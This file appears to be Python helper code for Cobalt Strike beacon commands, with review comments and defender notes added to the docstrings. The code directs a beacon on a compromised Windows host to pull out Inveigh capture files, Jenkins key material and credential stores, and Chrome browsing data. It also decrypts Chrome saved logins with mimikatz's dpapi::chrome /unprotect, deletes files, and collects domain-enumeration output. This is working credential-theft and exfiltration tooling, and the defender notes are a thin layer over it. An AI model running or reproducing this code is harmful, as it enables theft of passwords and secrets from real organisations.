def _(bid):
    """Task the beacon to delete ``temp.exe`` in the guessed home directory and download the file ``c`` from there.

    Args:
        bid: beacon id passed straight through to the aggressor calls.

    Registered as a command handler elsewhere (decorator not visible here).
    """
    # An earlier revision pointed at the user's local app-data directory; the
    # current code uses the bare home directory. Kept for reference.
    #temp = r'{}\AppData\Local'.format(helpers.guess_home(bid))
    temp = r'{}'.format(helpers.guess_home(bid))
    out_file = r'{}\c'.format(temp)
    dest = r'{}\temp.exe'.format(temp)
    # NOTE(review): what `temp.exe` and `c` are is not established here —
    # presumably artifacts left by an earlier task; verify against the caller.
    # Removal happens first, then the download; there is no check that
    # either path exists before tasking.
    aggressor.brm(bid, dest)
    aggressor.bdownload(bid, out_file)
def _(bid, home=None):
    """Task the beacon to download Inveigh output files from the user's roaming Microsoft directory.

    Args:
        bid: beacon id.
        home: user home directory; when falsy it is guessed via
            ``helpers.guess_home(bid)``.

    Defender note: the five fixed file names below, sitting directly under
    the roaming Microsoft directory, are the artifacts this routine expects
    Inveigh to have written; their presence is itself an indicator.
    """
    if not home:
        home = helpers.guess_home(bid)
    directory = r'{}\AppData\Roaming\Microsoft'.format(home)
    aggressor.btask(
        bid, 'Tasked beacon to grab inveigh files from {}'.format(directory))
    # Each name is fetched unconditionally; no existence check is made here.
    for fname in ('clear', 'log', 'v1', 'v2', 'form'):
        aggressor.bdownload(bid, r'{}\{}'.format(directory, fname))
def _(bid, host=None):
    """Task the beacon to download Jenkins configuration and secret files.

    Args:
        bid: beacon id.
        host: remote host name; when truthy the Jenkins directory is turned
            into a UNC path via ``helpers.path_to_unc`` and the files are
            fetched from there.

    Defender note: the list includes the Jenkins key material
    (``secret.key``, ``secrets/master.key``, ``secrets/hudson.util.Secret``)
    and the credential store (``credentials.xml``); reads of these files by
    anything other than the Jenkins service itself are worth alerting on.
    """
    jenkins_dir = r'C:\program files (x86)\jenkins'
    files = [
        'secret.key',
        'queue.xml',
        'config.xml',
        'jenkins.xml',
        'github-plugin-configuration.xml',
        'credentials.xml',
        'scriptApproval.xml',
        'scm-sync-configuration.xml',
        'secrets/master.key',
        'secrets/hudson.util.Secret'
    ]
    # NOTE(review): indentation was lost in the source, so whether the loop
    # below sits inside this `if host:` block is not recoverable. `prefix` is
    # only bound on this branch, so the loop is placed inside it here; with a
    # falsy `host` the function does nothing. Confirm against the original.
    if host:
        prefix = helpers.path_to_unc(host, jenkins_dir)
        aggressor.btask(
            bid, 'Tasked beacon to download files in {}: {}'.format(
                prefix, ', '.join(files)))
        for fname in files:
            # The 'secrets/...' entries keep their forward slash; only the
            # prefix/name join uses a backslash.
            path = r'{}\{}'.format(prefix, fname)
            aggressor.bdownload(bid, path, silent=True)
def _(bid):
    """Task the beacon to collect Chrome profile files from the guessed user's Default profile.

    ``History``, ``Bookmarks`` and ``Web Data`` are downloaded directly.
    ``Login Data`` is copied to a ``.bak2`` sibling, that copy is passed to
    mimikatz's ``dpapi::chrome`` module with ``/unprotect``, and the copy is
    then removed. The cookie handling is commented out, so ``cookies`` and
    ``cookies_copied`` are computed but never used.

    Args:
        bid: beacon id.

    Defender note: the transient ``Login Data.bak2`` file and the mimikatz
    dpapi module invocation are the observable artifacts of this routine;
    the direct downloads leave no on-disk trace on the host.
    """
    chrome_dir = r'%localappdata%\Google\Chrome\User Data\Default'
    # %localappdata% is substituted by hand from the guessed home directory —
    # presumably because the path is not expanded by a shell on the target.
    chrome_dir_guessed = chrome_dir.replace(
        '%localappdata%', r'{}\AppData\Local'.format(helpers.guess_home(bid)))
    login_data = r'{}\Login Data'.format(chrome_dir_guessed)
    cookies = r'{}\Cookies'.format(chrome_dir_guessed)
    history = r'{}\History'.format(chrome_dir_guessed)
    bookmarks = r'{}\Bookmarks'.format(chrome_dir_guessed)
    web_data = r'{}\Web Data'.format(chrome_dir_guessed)
    login_data_copied = '{}.bak2'.format(login_data)
    # Unused while the cookie steps below stay commented out.
    cookies_copied = '{}.bak2'.format(cookies)
    # non-protected files (History/Bookmarks)
    aggressor.bdownload(bid, history)
    aggressor.bdownload(bid, bookmarks)
    aggressor.bdownload(bid, web_data)
    # protected files (Login Data/Cookies)
    # The shell-based copy was replaced by aggressor.bcp; kept for reference.
    #aggressor.bshell(bid, 'copy "{}" "{}"'.format(login_data, login_data_copied))
    aggressor.bcp(bid, login_data, login_data_copied)
    #aggressor.bshell(bid, 'copy "{}" "{}"'.format(cookies, cookies_copied))
    #aggressor.bmimikatz(bid, r'dpapi::chrome /in:"{}" /unprotect'.format(cookies_copied))
    aggressor.bmimikatz(
        bid, r'dpapi::chrome /in:"{}" /unprotect'.format(login_data_copied))
    # Clean up the copy; no error handling if bcp or mimikatz failed first.
    aggressor.brm(bid, login_data_copied)
def _(bid, *files):
    """Download every path in ``files`` from the beacon host, one task per path.

    Args:
        bid: beacon id.
        *files: full paths as understood by the beacon.
    """
    for path in files:
        aggressor.bdownload(bid, path)
def callback(path):
    """Download ``path`` from the beacon host.

    ``bid`` is a free variable taken from the enclosing scope, which is not
    visible here; this is a closure handed to some caller that supplies paths.
    """
    aggressor.bdownload(bid, path)
def callback(path):
    """Download ``path`` from the beacon host if its extension is in ``extensions``.

    ``bid`` and ``extensions`` are free variables from the enclosing scope,
    which is not visible here.
    """
    # Text after the last dot; a path with no dot yields the whole path as
    # "extension", and the comparison is case-sensitive.
    ext = path.split('.')[-1]
    if ext in extensions:
        aggressor.bdownload(bid, path)
def _(bid, directory, *files):
    """Download each of ``files`` from ``directory`` on the beacon host.

    Args:
        bid: beacon id.
        directory: directory the bare names are joined to with a backslash.
        *files: bare file names.
    """
    full_paths = (r'{}\{}'.format(directory, name) for name in files)
    for full_path in full_paths:
        aggressor.bdownload(bid, full_path)
def _(bid, *args):
    """Download one file whose path may have been split on spaces.

    Args:
        bid: beacon id.
        *args: path fragments; they are re-joined with single spaces, so runs
            of several spaces in the original path are collapsed.
    """
    aggressor.bdownload(bid, ' '.join(args))
def _(bid):
    """Stage 2 of 3 of the domain-enum workflow: download the ``*.domain`` output files.

    Args:
        bid: beacon id.

    The files are expected in the temp directory guessed by
    ``helpers.guess_temp``; each is fetched unconditionally. The task note
    tells the operator to run ``domain-enum-next2`` afterwards.
    """
    temp = helpers.guess_temp(bid)
    aggressor.btask(
        bid, 'Tasked beacon to download files from domain-enum (stage 2/3). Once finished run domain-enum-next2'
    )
    aggressor.bdownload(bid, r'{}\objects.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\policy.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\sites.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\subnets.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\gpo_localgroups.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\gpo_delegations.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\gpo_acls.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\trusts.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\managers.domain'.format(temp))
    aggressor.bdownload(bid, r'{}\interesting_acls.domain'.format(temp))